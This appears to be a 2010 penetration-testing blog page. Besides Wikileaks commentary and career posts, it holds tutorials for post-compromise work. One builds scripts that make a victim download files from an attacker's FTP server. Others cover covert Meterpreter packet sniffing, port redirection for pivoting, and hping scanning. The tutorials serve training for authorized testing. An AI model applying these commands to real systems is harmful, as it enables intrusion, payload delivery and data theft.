Tuesday, 30 November 2010

Some thoughts and analysis of the Wikileaks "Cablegate" situation

The current Wikileaks "Cablegate" case is interesting on a variety of IT Security topics, especially around access control, and the effect that Web 2.0 can have on confidential and secret information.

From a data security perspective, I feel that this is a relatively new situation that is catching the US government off-guard. Certainly it is a situation brought to a new level by the internet (and the public's desire to read about political gossip).

I will stay away from the politics, but here are some of my thoughts about the data, and the data security, in brief.

Very worrying for the US Government

This is a very worrying situation for the US Government. Data loss of this magnitude and media interest is unprecedented. I feel that this situation is likely to cause political diplomacy issues for some time to come.

I am sure that US data security will be tightened as a result (so some good will come of it) perhaps with new legislation. Meanwhile the information contained in the cables is getting frontpage coverage on every national newspaper worldwide.

The Wikileaks Cablegate data online

Wikileaks have certainly spent a lot of effort making the data available, with multiple mirrored websites.

The data is getting indexed (and cached) by Google, making searching very powerful if you know how to use Google operators.

For Google searching, it would be possible to use expressions like the following for example

...but then if you know your Google operators, you could probably combine that with something more focused.

As I said, the data is also being cached by Google (and other search engines) so if the sites were to be taken down, then it may still be possible to access the information by clicking on the "cache" links provided by Google.

It is interesting that data never really goes away on the internet, once it is out there, it is out there, and there would be no way of removing all of the instances of the data, no matter how hard someone tries.

Release of information rate, and data-cleansing

The release of new information is rather slow. I suspect this is due to the data-cleansing that Wikileaks are currently doing (they seem to be removing names of individuals from the data before publication, except for names of senior politicians and leaders, though I am not sure what the logic behind that is).

With just over 0.1% of the data currently hosted, and a small dribble of new data each day, I feel that it is going to take a massive amount of effort for Wikileaks to publish the data. They are talking about sanitizing a quarter of a million documents, an enormous task!

I would estimate it will take several years to release all the data at this rate. It's a huge project, and will take considerable time and resources to complete. Meanwhile, news keeps coming with each release, and some of the press have their own copy of the data (Though I think people will get bored of it within 6 months, if Wikileaks lasts that long...)

Denial of service

I saw a tweet earlier in the week (right after the launch of the Cablegate data) that Wikileaks described that their systems were under attack from a distributed denial of service attack (DDoS).

This may be the US Government, or third parties acting on behalf of, or completely independently of them. I am sure this situation will change rapidly over time, such is the nature of DDoS and defenses against it.

The cablegate.wikileaks.org platform

Interestingly, looking at the DNS records, I can see that Wikileaks are currently hosting part of the Cablegate site on Amazon EC2 (certainly one of their mirrors I checked the DNS for at is located at the Seattle Amazon EC2 location). Other servers are currently located in France.

If the US do decide to pull-the-plug on Wikileaks, then I would think it would be relatively straightforward for the current platform. Whether this could be classed as "political censorship of the web" is open for debate - but as I said, I will stay away from the politics.

Anyway, I feel it would be easier to take the current platform off-line by political pressure, negotiations with vendors, and legal means rather than DDoS.

However, it would likely just pop up somewhere else - such is the nature of the internet. Once the data is out there it will not be deletable.

Also, the small amount of data released so far is easily available via bit-torrent among other file-sharing methods.

Cable data

It seems that the cables are each quite small pieces of data, like telegrams. The cables are very compact and concise, apparently being typically around 1,000 words (around 6K each).

If this is representative of the rest of the data, then this would put 250,000 documents at a size of around 1.5GB. However, due to the nature of the data, I would say that it would compress at a good ratio (with Winzip for example) perhaps down to 500MB, so easily would have fit onto a memory stick, SD card, recordable CD or DVD.

In other words, with todays technology a quarter of a million cables are surprisingly portable. Perhaps this is how it was stolen (it has been suggested in the past that a CD-R format was used by Bradley Manning, and that this is where the data came from).

Need to know

Mitigations for this leak should have been better (my opinion). From a data governance perspective, It looks like there has been a huge failing in the application of "least privilege", i.e. the "need to know".

I have seen reports that suggest that up to 1 million US military, and law enforcement personnel may potentially have had the level of access required to view some of this data. If true, that is an incredible situation and no surprise that something this damaging has happened.

I doubt this is true, but in any case, access control and data loss prevention seem to have been lacking - I am sure this is currently in urgent review!

Sunday, 28 November 2010

FTP transfers from within a non-interactive shell (Windows and Linux)

This post covers how an attacker can perform FTP file transfers from within a non-interactive shell (for both Windows and Linux target systems)

Please use this information for legitimate penetration testing purposes only.

When a system is compromised by an attacker, it is common to try to initiate a command shell so that the system can be remotely controlled; commands issued, and files uploaded/downloaded.

However, basic non-interactive shells to compromised systems can be rather tricky to use, because it is so easy to make a mistake and run an interactive program, and then loose control of your shell (and connectivity to the compromised host).

This is why I generally prefer to get an SSH or Metasploit Meterpreter session going once I have initially compromised a system. Before an attacker could do this however, they would need to upload or download files from the system, perhaps using FTP, TFTP, SSH or HTTP. Here we look specifically at FTP.

The interactive nature of the FTP console

As the FTP program provides an interactive prompt, it is not straight-forward to use it in a non-interactive shell. Once you start the FTP command, the FTP console will be stuck waiting for input it can never get.

So how can you use FTP in a non interactive shell?

In these examples our attacking system ( has an FTP server running, hosting our malicious files (in this case, test.txt)

FTP in a non-interactive shell to a Windows system

For a Windows system, this is relatively easy because the Windows version of FTP supports the "-s" option.

This enables an attacker to create a script of FTP commands, and then run that script on the remote system.

The script containing the FTP commands can be put on the remote system by echoing commands to a new file on the system using the shell. This sounds complicated but is literally a question of pasting something like the following blob of commands into the shell:

echo open 21> ftp.txt
echo anonymous>> ftp.txt
echo ftp@ftp.com>> ftp.txt
echo bin >> ftp.txt
echo get test.txt >> ftp.txt
echo bye >> ftp.txt

This script file can then be checked with the following command. Each line above has created a line in the script file on the remote system.

type ftp.txt

open 21

get test.txt

This can then be executed on the remote system, like this:

ftp -s:ftp.txt

This works well and is quick and easy in a Windows shell, however, the task is slightly more complex on a Linux system.

FTP in a non-interactive shell to a Linux system

Normally the FTP command shell on Linux does not have the "-s" option, so we will need to build a shell script to execute the FTP commands. Something like this will work.

echo "#!/bin/sh" >> ftp3.sh
echo "HOST=''" >> ftp3.sh
echo "USER='anonymous'" >> ftp3.sh
echo "PASSWD='blah@blah.com'" >> ftp3.sh
echo "FILE='test.txt'" >> ftp3.sh
echo "" >> ftp3.sh
echo "ftp -n \$HOST <<BLAH " >> ftp3.sh
echo "quote USER \$USER" >> ftp3.sh
echo "quote PASS \$PASSWD" >> ftp3.sh
echo "bin" >> ftp3.sh
echo "get \$FILE" >> ftp3.sh
echo "quit" >> ftp3.sh
echo "BLAH" >> ftp3.sh
echo "exit 0" >> ftp3.sh

When pasted into a non-interactive shell the above commands will produce a script file on the remote vicitm, "ftp3.sh".


ftp -n $HOST <<BLAH
quote USER $USER
get $FILE
exit 0

To check, and run this script, simply execute the following commands:

cat ftp3.sh
chmod 777 ftp3.sh

...and this will use FTP to download our test file to the target system.

Using this technique it would be relatively easy to put additional files on the victim system, such as; connectivity tools, privilege-escalation exploits, back-doors, and also copy files from the victim system using the same method (with a put rather than a get).

Adding the "echo"s to your own scripts

So, say you have some commands you want to put onto the remote system as a script. It would be a bit of a pain to manually add all those "echo"s to each line, so here is an easy way to add the prepended "echo", and the appended ">> file.txt" to each line.

cat ftp2.sh | sed 's/^/echo "/' | sed 's/$/" >> ftp3.sh/' | sed 's/\$/\\\$/'> ftpecho.txt

(This command would be used on the attacking system, to prepare the blob of echo commands you want to paste into the non-interactive shell. It also helps protect the $ character which was used in the Linux script above for shell-script variables).

Saturday, 27 November 2010

Metasploit: Using the Meterpreter sniffer extension to collect remote network traffic

Once an attacker has gained a foot-hold by compromising and initial host, one of the first things he needs do is some basic host and network reconnaissance in order to see "where he is" and "what he can do next".

One of the techniques that could be used, is passive network reconnaissance, i.e. packet-sniffing to "listen" to the victims LAN for interesting traffic. Here we explore how to use a sniffer such as the Metasploit Meterpreter sniffer extension.

Please remember to use these techinques only for legitimate penetration testing, not for malicious purposes. Every action you take has consequences, and you will be heir to the results of your actions.

Broadcast traffic

Several protocols broadcast interesting traffic, and capturing internal LAN  traffic can be very useful to an external attacker, to assist in information gathering and compromising further systems in the "soft underbelly" of the internal LAN.

You can find out a lot about a network by running a network packet sniffer such as wireshark, tshark or tcpdump. However, an external attacker will likely want to keep a low profile so installing an application where it does not exist previously is not a wise idea.

Using the Metasploit Meterpreter sniffer extension means that no additional software is installed, no files are written to disk; everything is stored in memory, and all communications between the attacker and victim are encrypted. (This makes intrusion detection and forensic analysis rather difficult!)

Let's take it as read that the initial host has already been compromised, and pick up from there. We can load the Meterpreter sniffer extension as follows

meterpreter > use sniffer
Loading extension sniffer...success.
meterpreter > help


Sniffer Commands

    Command             Description
    -------             -----------
    sniffer_dump        Retrieve captured packet data to PCAP file
    sniffer_interfaces  Enumerate all sniffable network interfaces
    sniffer_start       Start packet capture on a specific interface
    sniffer_stats       View statistics of an active capture
    sniffer_stop        Stop packet capture on a specific interface

...we can then examine what interfaces we have on the remote victim system. This system has two interfaces (which is interesting in itself) and we go ahead and start the sniffer on the first interface:

meterpreter > sniffer_interfaces

1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
2 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )

meterpreter > sniffer_start 1
[*] Capture started on interface 1 (50000 packet buffer)

During the capture, we can check progress of the collection by issuing a sniffer stats command:

meterpreter > sniffer_stats 1
[*] Capture statistics for interface 1
        bytes: 32178
        packets: 211

...and then dump some traffic:

meterpreter > sniffer_dump 1
[-] Usage: sniffer_dump [interface-id] [pcap-file]
meterpreter > sniffer_dump 1 test1.pcap
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 910 packets (137240 bytes)
[*] Downloaded 100% (137240/137240)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test1.pcap
meterpreter > lpwd
meterpreter > sniffer_dump 1 test1b.pcap
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 4609 packets (787199 bytes)
[*] Downloaded 066% (524288/787199)...
[*] Downloaded 100% (787199/787199)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test1b.pcap

So, we have downloaded a couple of captures to our /root directory. Let's try the other interface, so see if there is any data there also:

meterpreter > sniffer_stop 1
[*] Capture stopped on interface 1
meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
meterpreter > sniffer_dump 2 test2.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 18 packets (3924 bytes)
[*] Downloaded 100% (3924/3924)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test2.pcap
meterpreter > sniffer_dump 2 test2b.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 296 packets (57775 bytes)
[*] Downloaded 100% (57775/57775)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test2b.pcap

Capturing the data didn't take long at all, as it is a very easy process. Now that we have our pcap network capture files, we can examine them locally at our leisure on the attacker system. This can be done with a nice graphical tool like Wireshark, to filter the traffic and see what we could learn about the remote victim network.

Here we filter Netbios/SMB broadcast traffic to see what systems we can see on the remote network. This is especially good for finding live Windows systems (which are rather noisy on a LAN)

Other filters could be applied to other broadcast traffic such as; address resolution (ARP, RARP), router discovery, routing protocol advertisements, DHCP, AppleTalk, and other broadcast services, such as file and print.

Using these methods, we can gather a list of live IP addresses, address ranges, and machine types, and all this information can be collected before we even start actively scanning the remote network. This keeps a very low profile for targeted attacks.


Once a single system is compromised, it is only a matter of a short amount of time before an attacker can gather enough local information to "pivot" his attack and extend the attack to other local systems.

In secure environments, it is vitally important that every host is secured. This includes virtual hosts, and test systems, as these could also be used as bridgehead to silently sniff, or attack other systems on the internal LAN.

Also, it is important that there is sufficient network segmentation, internal firewalls and limiting of broadcast traffic, to help minimise the damage in the case of a single compromised system.

Backtrack 4 tips: KDE Konsole tabs

When working with Backtrack 4, it is common to have multiple shells open (I do this all the time)

You may want one for a Metasploit console, one for a Python shell, one for generating some shellcode, one for a reverse shell listener, port redirection, tcpdump/tsharck etc. (Well this is how I work anyway).

Here is a top tip for managing your many shells.

KDE Konsole tabs

KDE Konsole lets you have tabbed shells (so use them well). Tabs are displayed along the bottom of the window (or the top if you prefer).

To work efficiently with several concurrent shells:
  1. Open a few Konsole tabs in the same window by clicking on the new tab window (bottom left button)
  2. Quickly label your tabs (Ctrl + Alt + S) and enter a name (It only takes a few seconds, and saves hunting for the right shell!)
  3. To scroll between shell tabs use Shift + arrow keys
  4. To move your shell tabs around, use Ctrl + shift + arrow keys
  5. Add more shells (Ctrl + shift + N) and label them as you need them
  6. Exit the ones you don't need any more, with the button, bottom right (no shortcut for this which prevents mistakes!)

I find this makes managing many shells a lot easier. Rather than have lots of windows open, you can see what you have open all in one place and "Shift-arrow" between them, and then "Alt-tab" to your other applications and back. (The keyboard is a lot quicker than a mouse ;o)

I can easily and quickly manage 10 to 15 shells at once with these methods - that's probably as much as I have every needed.

Switching desktops

I often use more than one desktop. Maybe I have some web-browsing on one screen, and while reviewing some course material on another, and have an exploit development setup going on another.

If you want to fast-switch between desktops in KDE, then the keyboard shortcut is "Ctrl-F1", for the first screen, "Ctrl-F2" for the second, etc...

(took me a while to find that one, but it is pretty handy, I was used to "Ctrl-ArrowKeys" in Gnome)

Tuesday, 23 November 2010

Backtrack 4 R2 released - my first upgrades and use of it today

I have been playing around with the latest release of Backtrack (Version 4 R2, which was released on Friday) for most of today.

Backtrack is the world best Linux distribution for Ethical Hacking and Penetration testing, with hundreds of tools built in and configured ready to go.

The latest distribution can be downloaded from here
and this is a screen shot from one of my systems I upgraded this morning, from a DVD ISO image I cut with Brasero.

This is a Dell Mini10 system so can be a bit fussy with the drivers etc, but everything worked fine out of the box. Even the boot-splash works this time (using the "fix-splash800" command).

For my other test system I used the alternative method to get to R2, using the the following commands.

apt-get update && apt-get dist-upgrade

This was a pretty quick process, and apart from my Firefox shortcuts disappearing, pretty seamless.

I've been using these systems all day and haven't found any issues yet, so all good so far.

Monday, 22 November 2010

Using winrelay or fpipe for port redirection via a Windows host

When attacking networks in a pentest, it is sometimes useful to be able to redirect tcp or udp traffic, via an intermediary system.

This may be to obfuscate the source of the attack, or perhaps because the victim host (ip address and port combination) is not directly accessable for the attacking machine.

This is commonly used in pivoting, i.e. to attack an initial host, and then use that compromised system to attack other systems on the network, which were not initially accessable.

Here we look at two Windows commandline tools which can be used for port redirection; winrelay and fpipe, and test them.

These techniques should only be used on your own test systems, or where you have express permittion to do penetration testing.

winrelay from ntsecurity.nu

This tool can be downloaded here and there are various options:

Let's look at an example:
The command below would be run on the intermediary system. The victim system in this case is on port 80. 

C:\>winrelay.exe -lip -lp 81 -dip -dp 80 -proto tcp

WinRelay 2.0 - (c) 2002-2003, Arne Vidstrom (arne.vidstrom@ntsecurity.nu)
             - http://ntsecurity.nu/toolbox/winrelay/

This can be tested easily by using netcat and typing a simple HTTP GET request from the attacking system. For example

nc -nvv 81
(UNKNOWN) [] 81 (?) open

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 13:05:55 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-bt0 with Suhosin-Patch
Last-Modified: Mon, 22 Nov 2010 09:01:37 GMT
ETag: "259f4a-9-495a080ea7e40"
Accept-Ranges: bytes
Content-Length: 9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

sent 17, rcvd 306

So that worked fine, but winrelay doesn't log any connections to the screen, so not much to see on the intermediary system.

In my testing I also tried using wfuzz to try to brute force some common webserver file locations on my victim system using the relay. It worked well and here is the output:

Fpipe.exe from foundstone

This tool can be downloaded here and, again there are various options, so we will do a similar test to that above:

C:\Documents and Settings\Administrator\Desktop>fpipe -l 82 -c 512 -r 80
FPipe v2.1 - TCP/UDP port redirector.
Copyright 2000 (c) by Foundstone, Inc.

Pipe connected:
   In: -->
  Out:  -->
Pipe connected:
   In: -->
  Out:  -->

As you can see, Fpipe logs connections to the screen, so more to see, and the HTTP GET request test from the attacking system (below) works as expected.

nc -nvv 81
(UNKNOWN) [] 81 (?) open
HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 13:14:03 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-bt0 with Suhosin-Patch
Last-Modified: Mon, 22 Nov 2010 09:01:37 GMT
ETag: "259f4a-9-495a080ea7e40"
Accept-Ranges: bytes
Content-Length: 9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

 sent 17, rcvd 306

However, I found difficulty in getting the web brute force attack to work using fpipe. I will have to have a look with wireshark when I have more time to see what was going wrong...

Saturday, 20 November 2010

Adobe PDF Reader X; The worlds most dangerous desktop application gets a fix

Lets face it; the security record of Adobe has not been good over the past few years, with an increasing number of exploits for Adobe products available in the wild.

These have frequently made network security professionals jobs difficult, with several 0-day PDF vulnerabilities meaning that attackers could easily penetrate network defenses using a client-side attack, by sending a malicious PDF document in an email or URL for example.

The difficulty of blocking these threats

These attacks have been very difficult to do anything about, especially as the malicious documents could be specially crafted as part of sophisticated spear-phishing attack, with uniquely created or encoded payloads. This is a lot easier than it sounds, if you have the knowledge, and there is no way that a signature-based anti-virus tool would have been able to stop such targeted attacks.

Also as usage of PDF documents is ubiquitous in the commercial world, so there was no way that system administrators could justify blocking all PDFs at the boundary.

A solution

Thankfully Adobe X Reader is here which uses sandbox technology to isolate threats in PDF documents. It may take a while before most enterprises deploy this software to all of their computer systems. Meanwhile the door is still open for attackers. (I am sure there are more vulnerabilities still to be discovered in older versions of Adobe Reader)

So, if you are a security manager or sysadmin, and are keen to secure your network from this type of attack, I suggest you put a plan together to roll this out to all of your desktops and laptops, as soon as you can.

Pentesting with Backtrack and the OSCP certification vs more theoretical courses

I am a firm believer that IT Security certification should have a big element of practical and real-world training and testing.

Having studied and passed the CISSP and CISM certifications, I can speak from experience that these don't really teach someone how to defend a company from malicious attack, nor do they cover any detail of the techniques that modern attackers will use to penetrate networks.

It looks to me that CISSP, CISM, and even CEH (Certified Ethical Hacker) are a class of exam that teach "information" rather than "knowledge". I feel that true knowledge comes from real experience, and the practical application of information and techniques.

I am not knocking CISSP, CISM, or CEH, these certification are great, and give a very good background in IT Security from either a management or technical perspective. In addition, these certifications require you to submit proof of a level of work experience in IT Security.

What I am saying, is that I feel security experts need real world "offensive" experience to truly understand threats. I also feel that it is important for exams to prove practical skills, which is why I would recommend the Offensive Security courses.

A comparison theoretical vs practical exams

CISSP is a 6 hour exam of multiple choice questions. Read the question (several times) and then tick box A, B, C or D - for 6 hours.

It's a tough certification, and some of the questions are worded in an awkward way. It covers an extremely broad field of IT Security, so it proves you can memorize and recall lots of information, but I feel it does not prove what you can do, or what you truly know.

Compare that to an exam like OSWP (which I passed earlier this year) in which you have 4 hours to break into several secured wireless access points, and write a report to prove what you have found and how - It's a different ball game altogether, and I have to say, it was the most enjoyable exam I have ever taken!

I am currently in the process of studying Pentesting with Backtrack, which culminates in a 24 hour live pentest exam, where you have to break into various systems.

You then have a further 24 hours to write-up and submit your results in a professional penetration test report. (apparently most students stay awake and work for the full 24 hours of the pentest, so it's no walk in the park)

What are the benefits of practical exams?

Clearly, if you are looking to be a real-world penetration tester, there is no better training, or proof that you know what you know, than practical courses and exams like the ones offered by Offensive Security.

If you are a network defender, the techniques learned on a course like PwB are invaluable in teaching you the importance of patch management, secure coding, secure configurations, the dangers information leakage and poor passwords. It will also likely give you an improvement in your general networking knowhow for Linux and Windows systems.

For example; In my view, there is nothing like the experience of cracking a file full of password hashes, in a few seconds, to make you have a much better appreciation of what makes passwords secure, and to change your behavior to choose better passwords.

I certainly choose better passwords now ;o)

My recommendation

To be a well rounded and knowledgable IT Security professional, you need a mix of training and certifications, some theoretical, and some very practical.

Wednesday, 17 November 2010

Fixing a broken Metasploit 3 install on Backtrack 4

A couple of times over the past year, I have somehow broken Metasploit on a Backtrack 4 install. This can sometimes happen if you lose an internet connection whilst running msfupdate.

When this happens, Metasploit will fail to start, with some nasty error messages, basically saying there are file mismatches  or missing files. Metasploit will no longer update using msfupdate, and this can be a pain if you have a HDD or USB install of Backtrack.

Here is how to fix this issue, by reinstalling MSF from the Metasploit repository (pretty simple, delete the current Metasploit install, and reinstall)

cd /opt/metasploit3
rm -rf msf3
svn co https://www.metasploit.com/svn/framework3/trunk msf3

 (Choose "p" if it asks a question about trusting the repository)

After it has finished updating, you will have a working Metasploit Framework again. Hurrah!

(Note: /pentest/exploits/framework3/ is only a link. The real location for the Metasploit install is in /opt/metasploit3/msf3)

Friday, 12 November 2010

The most popular IT Security qualifications - by demand and salary

Some sites track the appearance of certain criteria in job advertisements, and this can be a good guide as to what employers are looking for in terms of qualifications.
 So which are the most popular certifications for IT Security?

Let's look at some data from www.itjobswatch.co.uk and compare 7 IT Security qualifications, and 7 generic IT qualifications:

IT Security qualifications
DescriptionRankRank ChangeAverage Salary% ChgNo.% of total

Interesting things include the high average salary but low demand of CEH, the high demand of CISSP, and low demand for Checkpoint and GIAC. Also, no difference in demand or salary between CCSA and CCSP.

General IT  qualifications
DescriptionRankRank ChangeAverage Salary% ChgNo.% of total

Interesting things here, high average salary for ITIL, relatively equal salaries for RHCT and RHCE, and Microsoft qualifications not demanding salaries that they used to.

Though this does not tell much about the job types involved, it does show some interesting results in salary trends and demand.

Sunday, 7 November 2010

The how and why of IT Security - interesting presentations

I've watched a lot of hacker-conference videos recently, and several of them have made a strong impression. I feel that these two together excellently demonstrate current challenges in offensive/defensive IT Security.

Rather than waffle on too much about them I thought I would post links to them together here with a brief introduction.

If you work in IT Security I would suggest it is worth spending a couple of hours to watch these. Take a look.

First the how

Basically, the easiest way to attack most companies is by using social engineering techniques using email and web.

Dave Kennedy (Rel1k) demonstrates how to use the Social Engineering Toolkit

(The back-doored keyboard is interesting, but not so ubiquitous as attacks based around "click here" or "open attachment").

Anyway, it looks to me that employee IT Security training programs are probably the best solution to some of these issues.

Then the why
A good exploration of the economic motivations for cybercrime from Beau Woods.

Several really interesting points here, especially around; the motivations of attackers, the "we're outnumbered" situation, and how the market economy drives business to choose cheap solutions to meet regulatory requirements so that they can continue to do business.

In terms of solutions to the "why" I'm not sure that more regulation will really help improve IT Security budgets over the next few years, nor will it deliver real value. (If more solutions are mandated, this will drive down the budget for each solution to the cheapest - and probably worst.)

Saturday, 6 November 2010

Why ping does not work very well, and hping "the real ping"

(hping "the real ping"... ha ha, excuse the pun ;o)

I have mentioned to a few people, on occasions, that ping doesn't really tell you much about the availability of services you may be interested in troubleshooting.

When I have explained this in the past, I don't think everyone understood what I was saying (some detailed networking knowledge is required to understand the issues) so here is an attempt to clarify why "ping" doesn't work very well, and offer a better solution.
Ping may (or may not) tell you if there is some level of network connectivity between source and destination, and can be very useful in a LAN environment where there are no firewalls.

However, it is not service-focused and can be very misleading, especially for internet service troubleshooting where firewalls are involved.

1) Just because a host does not respond to ping, does not mean that there is a problem
  • ICMP packets (used in by the traditional ping command) are often blocked on firewalls as a recommended security feature. This is used to block malicious network reconnaissance and potential denial-of-service attacks, from ping-flooding and "ping-of-death" for example

2) Just because a host does respond to ping, does not mean that it is working perfectly fine
  • Most services run on specific UDP or TCP ports, ICMP is a different protocol, and proves nothing about whether the service you are troubleshooting is available and responding
  • Even if the server is up, and the service is running, this does not mean that you have the appropriate network access to connect to the service (a firewall could be blocking the relevant ports/protocols) so how can you test that?

How to use hping

hping3 is far more advanced than the ping command, is available for various platforms http://wiki.hping.org/download and offers many options.

There is quite an extensive set of options in the help

hping3 --help
usage: hping3 host [options]
  -h  --help      show this help
  -v  --version   show version
  -c  --count     packet count
  -i  --interval  wait (uX for X microseconds, for example -i u1000)
      --fast      alias for -i u10000 (10 packets for second)
      --faster    alias for -i u1000 (100 packets for second)
      --flood      sent packets as fast as possible. Don't show replies.
  -n  --numeric   numeric output
  -q  --quiet     quiet
  -I  --interface interface name (otherwise default routing interface)
  -V  --verbose   verbose mode
  -D  --debug     debugging info
  -z  --bind      bind ctrl+z to ttl           (default to dst port)
  -Z  --unbind    unbind ctrl+z
      --beep      beep for every matching packet received
  default mode     TCP
  -0  --rawip      RAW IP mode
  -1  --icmp       ICMP mode
  -2  --udp        UDP mode
  -8  --scan       SCAN mode.
                   Example: hping --scan 1-30,70-90 -S www.target.host
  -9  --listen     listen mode
  -a  --spoof      spoof source address
  --rand-dest      random destionation address mode. see the man.
  --rand-source    random source address mode. see the man.
  -t  --ttl        ttl (default 64)
  -N  --id         id (default random)
  -W  --winid      use win* id byte ordering
  -r  --rel        relativize id field          (to estimate host traffic)
  -f  --frag       split packets in more frag.  (may pass weak acl)
  -x  --morefrag   set more fragments flag
  -y  --dontfrag   set dont fragment flag
  -g  --fragoff    set the fragment offset
  -m  --mtu        set virtual mtu, implies --frag if packet size > mtu
  -o  --tos        type of service (default 0x00), try --tos help
  -G  --rroute     includes RECORD_ROUTE option and display the route buffer
  --lsrr           loose source routing and record route
  --ssrr           strict source routing and record route
  -H  --ipproto    set the IP protocol field, only in RAW IP mode
  -C  --icmptype   icmp type (default echo request)
  -K  --icmpcode   icmp code (default 0)
      --force-icmp send all icmp types (default send only supported types)
      --icmp-gw    set gateway address for ICMP redirect (default
      --icmp-ts    Alias for --icmp --icmptype 13 (ICMP timestamp)
      --icmp-addr  Alias for --icmp --icmptype 17 (ICMP address subnet mask)
      --icmp-help  display help for others icmp options
  -s  --baseport   base source port             (default random)
  -p  --destport   [+][+] destination port(default 0) ctrl+z inc/dec
  -k  --keep       keep still source port
  -w  --win        winsize (default 64)
  -O  --tcpoff     set fake tcp data offset     (instead of tcphdrlen / 4)
  -Q  --seqnum     shows only tcp sequence number
  -b  --badcksum   (try to) send packets with a bad IP checksum
                   many systems will fix the IP checksum sending the packet
                   so you'll get bad UDP/TCP checksum instead.
  -M  --setseq     set TCP sequence number
  -L  --setack     set TCP ack
  -F  --fin        set FIN flag
  -S  --syn        set SYN flag
  -R  --rst        set RST flag
  -P  --push       set PUSH flag
  -A  --ack        set ACK flag
  -U  --urg        set URG flag
  -X  --xmas       set X unused flag (0x40)
  -Y  --ymas       set Y unused flag (0x80)
  --tcpexitcode    use last tcp->th_flags as exit code
  --tcp-timestamp  enable the TCP timestamp option to guess the HZ/uptime
  -d  --data       data size                    (default is 0)
  -E  --file       data from file
  -e  --sign       add 'signature'
  -j  --dump       dump packets in hex
  -J  --print      dump printable characters
  -B  --safe       enable 'safe' protocol
  -u  --end        tell you when --file reached EOF and prevent rewind
  -T  --traceroute traceroute mode              (implies --bind and --ttl 1)
  --tr-stop        Exit when receive the first not ICMP in traceroute mode
  --tr-keep-ttl    Keep the source TTL fixed, useful to monitor just one hop
  --tr-no-rtt       Don't calculate/show RTT information in traceroute mode
ARS packet description (new, unstable)
  --apd-send       Send the packet described with APD (see docs/APD.txt)

To show how it works, let's have a look at some simple examples.

1) Suppose you want to check that a webserver is listening on TCP port 80, you can use hping to send a TCP SYN on port 80

hping3 -p 80 -S hostname

2) Similarly with an SMTP server

hping3 -p 25 -S hostname

Let's look at what happens with wireshark:

Basically hping is sending a series of TCP SYN packets, receiving the SYN/ACK (but not fully establishing the threeway handshake with an ACK). So we can see that the server is listening on that port, and willing to accept a TCP connection.

Other uses for hping

hping3 has extensive uses for IT Security testing here is one example; using hping as a port scanner

hping3 -p ++1 -S
HPING (wlan0 S set, 40 headers + 0 data bytes
len=44 ip= ttl=64 id=26293 sport=21 flags=SA seq=20 win=4096 rtt=2.1 ms
len=44 ip= ttl=64 id=26308 sport=23 flags=SA seq=22 win=4096 rtt=2.0 ms
len=44 ip= ttl=64 id=26654 sport=80 flags=SA seq=79 win=4096 rtt=1.9 ms

Here we can see the ++1 port option, and can see from the result that this system is responding on ports 21, 23, and 80 (FTP, Telnet and HTTP)

More reading is available here http://wiki.hping.org/33